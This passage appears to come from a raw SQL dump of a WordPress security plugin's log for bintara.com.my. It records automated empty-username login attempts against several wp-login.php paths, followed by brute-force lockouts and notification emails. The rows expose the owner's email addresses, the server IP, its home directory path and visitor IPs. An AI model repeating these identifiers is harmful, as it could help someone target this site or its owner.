attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:12:39\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:12:39\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:12:39\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:12:39\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:12:40','2019-09-21 14:12:39',17934624,19339544,'https://bintara.com.my/blog/wp-login.php',1,0,'138.68.30.2'),(26167,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:12:40','2019-09-21 14:12:39',18141064,19339544,'https://bintara.com.my/blog/wp-login.php',1,0,'138.68.30.2'),(26168,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYv5XkXpgmG5P@iB8k65wAAAJY\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"83.137.144.34\";s:11:\"REMOTE_PORT\";s:5:\"59757\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYv5XkXpgmG5P@iB8k65wAAAJY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569075173.4133\";s:12:\"REQUEST_TIME\";s:10:\"1569075173\";}}','notice','2019-09-21 14:12:54','2019-09-21 14:12:53',17846112,19336360,'https://bintara.com.my/wp/wp-login.php',1,0,'83.137.144.34'),(26169,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:12:53\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:12:53\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:12:53\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:12:53\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:12:54','2019-09-21 14:12:53',17930864,19336360,'https://bintara.com.my/wp/wp-login.php',1,0,'83.137.144.34'),(26170,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:12:54','2019-09-21 14:12:53',18137240,19336360,'https://bintara.com.my/wp/wp-login.php',1,0,'83.137.144.34'),(26171,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYwM1iJ7D9Gn7wDPh8lkgAAANc\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"124.217.235.99\";s:11:\"REMOTE_PORT\";s:5:\"47654\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYwM1iJ7D9Gn7wDPh8lkgAAANc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569075251.1993\";s:12:\"REQUEST_TIME\";s:10:\"1569075251\";}}','notice','2019-09-21 14:14:12','2019-09-21 14:14:11',17852168,19342368,'https://bintara.com.my/wordpress/wp-login.php',1,0,'124.217.235.99'),(26172,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:14:11\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:14:11\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:14:11\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:14:11\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:14:12','2019-09-21 14:14:11',17936880,19342368,'https://bintara.com.my/wordpress/wp-login.php',1,0,'124.217.235.99'),(26173,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:14:12','2019-09-21 14:14:11',18143296,19342368,'https://bintara.com.my/wordpress/wp-login.php',1,0,'124.217.235.99'),(26174,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYwNliJ7D9Gn7wDPh8lkwAAAMs\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"139.59.100.255\";s:11:\"REMOTE_PORT\";s:5:\"42616\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYwNliJ7D9Gn7wDPh8lkwAAAMs\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569075254.981\";s:12:\"REQUEST_TIME\";s:10:\"1569075254\";}}','notice','2019-09-21 14:14:16','2019-09-21 14:14:15',17849800,19339464,'https://bintara.com.my/2019/wp-login.php',1,0,'139.59.100.255'),(26175,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:14:15\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:14:15\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:14:15\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:14:15\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:14:16','2019-09-21 14:14:15',17934600,19339464,'https://bintara.com.my/2019/wp-login.php',1,0,'139.59.100.255'),(26176,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:14:16','2019-09-21 14:14:15',18141008,19339464,'https://bintara.com.my/2019/wp-login.php',1,0,'139.59.100.255'),(26177,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYwQrfBTP0kPOVnb8jxUgAAAEs\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"159.203.99.68\";s:11:\"REMOTE_PORT\";s:5:\"47790\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYwQrfBTP0kPOVnb8jxUgAAAEs\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569075266.8131\";s:12:\"REQUEST_TIME\";s:10:\"1569075266\";}}','notice','2019-09-21 14:14:28','2019-09-21 14:14:27',17849640,19338184,'https://bintara.com.my/test/wp-login.php',1,0,'159.203.99.68'),(26178,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:14:27\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:14:27\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:14:27\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:14:27\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:14:28','2019-09-21 14:14:27',17934368,19338184,'https://bintara.com.my/test/wp-login.php',1,0,'159.203.99.68'),(26179,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:14:28','2019-09-21 14:14:27',18140920,19338184,'https://bintara.com.my/test/wp-login.php',1,0,'159.203.99.68'),(26180,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYwcnkXpgmG5P@iB8k7TgAAAIM\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"108.179.219.7\";s:11:\"REMOTE_PORT\";s:5:\"36418\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYwcnkXpgmG5P@iB8k7TgAAAIM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569075314.6107\";s:12:\"REQUEST_TIME\";s:10:\"1569075314\";}}','notice','2019-09-21 14:15:15','2019-09-21 14:15:14',17849640,19338184,'https://bintara.com.my/blog/wp-login.php',1,0,'108.179.219.7'),(26181,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:15:14\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:15:14\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:15:14\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:15:14\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:15:15','2019-09-21 14:15:14',17934368,19338184,'https://bintara.com.my/blog/wp-login.php',1,0,'108.179.219.7'),(26182,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:15:15','2019-09-21 14:15:14',18140920,19338184,'https://bintara.com.my/blog/wp-login.php',1,0,'108.179.219.7'),(26183,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYwfDDrcQxTmGrCWuaUcwAAAcg\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:12:\"89.145.74.91\";s:11:\"REMOTE_PORT\";s:5:\"56807\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31: